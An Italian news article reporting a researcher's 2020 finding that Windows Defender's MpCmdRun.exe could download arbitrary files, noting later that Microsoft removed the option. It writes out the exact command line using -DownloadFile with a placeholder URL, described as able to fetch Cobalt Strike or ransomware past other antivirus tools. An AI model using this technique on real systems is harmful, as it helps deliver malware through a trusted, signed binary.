Perché Windows Defender potrebbe essere usato per scaricare malware

• Antimalware
• Windows Defender

Un ricercatore esperto di sicurezza informatica, Mohammad Askar, ha pubblicato un tweet che ha fatto non poco scalpore: un componente che è parte integrante di Windows Defender (da qualche tempo rinominato in Microsoft Defender) potrebbe essere addirittura sfruttato per scaricare malware.
Si tratta del file eseguibile MpCmdRun.exe che risiede nella cartella di Windows Defender e che è presente di default nell’installazione dell’antimalware di casa Microsoft.

Well, you can download a file from the internet using Windows Defender itself.

In this example, I was able to download Cobalt Strike beacon using the binary “MpCmdRun.exe” which is the “Microsoft Malware Protection Command Line”. pic.twitter.com/RdCira3QPt

— Askar (@mohammadaskar2) September 2, 2020

Askar ha spiegato che usando una sintassi simile alla seguente è di fatto possibile disporre il download automatico di qualunque file dalla rete memorizzandolo nella cartella specificata (nell’esempio %userprofile% indica la directory radice del profilo utente Windows in uso: vedere Breve guida all’uso delle variabili d’ambiente in Windows):

"%programdata%\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url URL_FILE_REMOTO -path %userprofile%

Provando a scaricare, a mo’ di test, l’eseguibile del ransomware WastedLocker il download avviene senza problemi.
La buona notizia è che Windows Defender rileverà poi i file dannosi scaricati con MpCmdRun.exe ma al momento è probabile che altri software antivirus possano cadere nel tranello riconoscendo l’eseguibile Microsoft come un file legittimo anche perché dotato di una firma digitale perfettamente valida.

Per non parlare del fatto che MpCmdRun.exe potrebbe essere utilizzato in attacchi evoluti scaricando parte del codice nocivo con un componente di sistema e combinandolo con l’utilizzo di altre vulnerabilità.
Ne abbiamo parlato nell’articolo Alcuni eseguibili di Windows 10 consentono il download di file potenzialmente dannosi.

Aggiornamento: i tecnici dell’azienda di Redmond hanno risolto il problema rimuovendo il supporto per l’opzione -DownloadFile a partire dalla release 4.18.2009.2-0 di Microsoft Defender.